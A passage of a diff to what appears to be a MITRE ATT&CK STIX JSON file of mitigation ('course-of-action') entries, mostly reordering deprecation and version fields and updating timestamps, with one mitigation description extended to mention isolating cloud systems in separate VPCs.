"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d",
@@ -180291,8 +208127,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.685Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--902286b2-96cc-4dd7-931f-e7340c9961da",
@@ -180337,8 +208173,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.248Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1022138b-497c-40e6-b53a-13351cbd4090",
@@ -180383,8 +208219,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.665Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -180429,8 +208265,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.120Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -180448,7 +208284,7 @@
"description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
"id": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"type": "course-of-action",
- "modified": "2019-10-10T15:57:52.418Z",
+ "modified": "2020-06-20T20:46:36.342Z",
"created": "2019-06-11T16:33:55.337Z",
"x_mitre_version": "1.1"
},
@@ -180470,8 +208306,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:31:37.073Z",
"created": "2019-04-26T19:30:33.607Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7009ba4d-83d4-4851-9fbb-e09e28497765",
@@ -180501,8 +208337,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:32:11.883Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1a7f5bd3-f6ee-4bd7-b949-2f3632ad6158",
@@ -180522,8 +208358,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:32:43.572Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--aaa92b37-f96c-4a0a-859c-b1cb6faeb13d",
@@ -180568,8 +208404,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.325Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -180609,8 +208445,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:34:09.544Z",
"created": "2019-04-24T16:57:19.391Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330",
@@ -180635,8 +208471,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:34:34.065Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--54e8722d-2faf-4b1b-93b6-6cbf9551669f",
@@ -180661,8 +208497,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:35:08.161Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--84d633a4-dd93-40ca-8510-40238c021931",
@@ -180682,8 +208518,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:35:33.631Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--12cba7de-0a22-4a56-b51e-c514c67c3b43",
@@ -180703,8 +208539,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:36:24.202Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--fae44eea-caa7-42b7-a2e2-0c815ba81b9a",
@@ -180724,8 +208560,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:36:50.328Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7aee8ea0-0baa-4232-b379-5d9ce98352cf",
@@ -180745,8 +208581,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:37:27.850Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739",
@@ -180766,8 +208602,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:37:57.004Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--33f76731-b840-446f-bee0-53687dad24d9",
@@ -180807,8 +208643,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.882Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ec42d8be-f762-4127-80f4-f079ea6d7135",
@@ -180833,8 +208669,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:39:30.292Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--4b998a71-7b8f-4dcc-8f3f-277f2e740271",
@@ -180879,8 +208715,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:40:00.118Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--6cac62ce-550b-4793-8ee6-6a1b8836edb0",
@@ -180900,8 +208736,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:40:27.401Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1e614ba5-2fc5-4464-b512-2ceafb14d76d",
@@ -180951,8 +208787,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.123Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -181002,8 +208838,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.917Z",
"created": "2019-04-22T13:54:51.385Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--8a61f6b9-6b7a-4cf2-8e08-f1e26434f6df",
@@ -181023,8 +208859,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:42:41.375Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c",
@@ -181054,8 +208890,8 @@
"type": "course-of-action",
"modified": "2020-03-31T12:49:14.885Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ec418d1b-4963-439f-b055-f914737ef362",
@@ -181075,8 +208911,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:43:58.738Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--a3e12b04-8598-4909-8855-2c97c1e7d549",
@@ -181101,8 +208937,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:44:28.440Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--44155d14-ca75-4fdf-b033-ab3d732e2884",
@@ -181137,8 +208973,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:44:56.371Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--56648de3-8947-4559-90c4-eda10acc0f5a",
@@ -181158,8 +208994,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:45:38.627Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--77fd4d73-6b79-4593-82e7-e4a439cc7604",
@@ -181179,8 +209015,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:45:55.012Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--6e7db820-9735-4545-bc64-039bc4ce354b",
@@ -181200,8 +209036,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:46:16.474Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--54246e2e-683f-4bf2-be4c-d7d5a60e7d22",
@@ -181241,8 +209077,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:46:41.947Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7a6e5ca3-562f-4185-a323-f3b62b5b2e6b",
@@ -181282,8 +209118,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:47:23.978Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--121b2863-5b97-4538-acb3-f8aae070ec13",
@@ -181303,8 +209139,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:47:59.038Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--402e92cd-5608-4f4b-9a34-a2c962e4bcd7",
@@ -181324,8 +209160,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:48:23.825Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e333cf16-5bfa-453e-8e6a-3a4c63d6bfcc",
@@ -181345,8 +209181,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:48:43.583Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1dcaeb21-9348-42ea-950a-f842aaf1ae1f",
@@ -181364,7 +209200,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2019-06-11T16:30:16.672Z",
+ "modified": "2020-06-09T20:51:00.027Z",
"created": "2019-06-11T16:30:16.672Z",
"x_mitre_version": "1.0"
},
@@ -181384,7 +209220,7 @@
"description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
"id": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264",
"type": "course-of-action",
- "modified": "2019-06-11T16:28:41.809Z",
+ "modified": "2020-06-09T20:48:12.326Z",
"created": "2019-06-11T16:28:41.809Z",
"x_mitre_version": "1.0"
},
@@ -181426,8 +209262,8 @@
"type": "course-of-action",
"modified": "2019-08-17T12:10:09.748Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--06824aa2-94a5-474c-97f6-57c2e983d885",
@@ -181452,8 +209288,8 @@
"type": "course-of-action",
"modified": "2019-07-24T19:49:43.716Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9ab7de33-99b2-4d8d-8cf3-182fa0015cc2",
@@ -181488,8 +209324,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.905Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--94f6b4f5-b528-4f50-91d5-f66457c2f8f7",
@@ -181509,8 +209345,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:12:34.303Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--45e7f570-6a0b-4095-bf02-4bca05da6bae",
@@ -181555,8 +209391,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.548Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--fe0aeb41-1a51-4152-8467-628256ea6adf",
@@ -181596,8 +209432,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.126Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ed202147-4026-4330-b5bd-1e8dfa8cf7cc",
@@ -181642,8 +209478,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.884Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--d2dce10b-3562-4d61-b2f5-7c6384b038e2",
@@ -181663,8 +209499,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:14:01.112Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--514e7371-a344-4de7-8ec3-3aa42b801d52",
@@ -181689,10 +209525,13 @@
"type": "course-of-action",
"modified": "2019-07-25T11:14:24.192Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2019-06-10T20:53:36.319Z",
+ "modified": "2019-06-10T20:53:36.319Z",
+ "type": "course-of-action",
"id": "course-of-action--b045d015-6bed-4490-bd38-56b41ece59a0",
"description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
"name": "Multi-factor Authentication",
@@ -181707,9 +209546,6 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "type": "course-of-action",
- "modified": "2019-06-10T20:53:36.319Z",
- "created": "2019-06-10T20:53:36.319Z",
"x_mitre_version": "1.0"
},
{
@@ -181730,8 +209566,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:14:52.662Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--da987565-27b6-4b31-bbcd-74b909847116",
@@ -181756,8 +209592,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:15:17.942Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec",
@@ -181782,8 +209618,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:15:39.400Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--ac008435-af58-4f77-988a-c9b96c5920f5",
@@ -181843,8 +209679,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.913Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--624d063d-cda8-4616-b4e4-54c04e427aec",
@@ -181879,8 +209715,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.652Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -181905,8 +209741,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:16:48.088Z",
"created": "2019-04-19T18:46:47.964Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -181931,7 +209767,7 @@
{
"id": "course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c",
"name": "Network Segmentation",
- "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.",
+ "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -181944,7 +209780,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:07:48.112Z",
+ "modified": "2020-05-14T13:05:39.500Z",
"created": "2019-06-10T20:41:03.271Z",
"x_mitre_version": "1.1"
},
@@ -181991,8 +209827,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.559Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--94e95eeb-7cdb-4bd7-afba-f32fda303dbb",
@@ -182037,8 +209873,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.119Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1f34230d-b6ae-4dc7-8599-78c18820bd21",
@@ -182083,8 +209919,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.867Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--46b7ef91-4e1d-43c5-a2eb-00fa9444f6f4",
@@ -182129,8 +209965,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.909Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -182175,8 +210011,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.647Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
@@ -182194,7 +210030,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:08:20.546Z",
+ "modified": "2020-06-19T16:50:45.681Z",
"created": "2019-06-06T21:16:18.709Z",
"x_mitre_version": "1.1"
},
@@ -182221,8 +210057,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:21:20.411Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d",
@@ -182277,8 +210113,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.915Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651",
@@ -182303,8 +210139,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:22:19.139Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -182349,8 +210185,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:22:39.929Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--e0703d4f-3972-424a-8277-84004817e024",
@@ -182405,8 +210241,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.168Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1881da33-fdf2-4eea-afd0-e04caf9c000f",
@@ -182451,8 +210287,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.899Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--dd9a85ad-6a92-4986-a215-b01d0ce7b987",
@@ -182497,8 +210333,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.874Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--2d704e56-e689-4011-b989-bf4e025a8727",
@@ -182518,8 +210354,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:25:29.091Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f6b7c116-0821-4eb7-9b24-62bd09b3e575",
@@ -182539,8 +210375,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:25:50.338Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1c6bc7f3-d517-4971-aed4-8f939090846b",
@@ -182565,8 +210401,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:26:14.570Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -182591,8 +210427,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:26:37.066Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f27ef4f2-71fe-48b6-b7f4-02dcac14320e",
@@ -182612,8 +210448,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:27:03.265Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
@@ -182651,7 +210487,7 @@
"description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
"id": "course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1",
"type": "course-of-action",
- "modified": "2020-03-31T13:10:38.269Z",
+ "modified": "2020-05-20T13:13:48.900Z",
"created": "2019-06-06T21:08:58.465Z",
"x_mitre_version": "1.1"
},
@@ -182698,8 +210534,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.656Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31",
@@ -182744,8 +210580,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:27:53.526Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--7c39ebbf-244e-4d1c-b0ac-b282453ece43",
@@ -182790,8 +210626,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.164Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--0640214c-95af-4c04-a574-2a1ba6dda00b",
@@ -182836,8 +210672,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:24.641Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c3cf2312-3aab-4aaf-86e6-ab3505430482",
@@ -182857,8 +210693,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:29:48.385Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--61d02387-351a-453e-a575-160a9abc3e04",
@@ -182883,8 +210719,8 @@
"type": "course-of-action",
"modified": "2019-07-25T11:30:18.799Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--f9b3e5d9-7454-4b7d-bce6-27620e19924e",
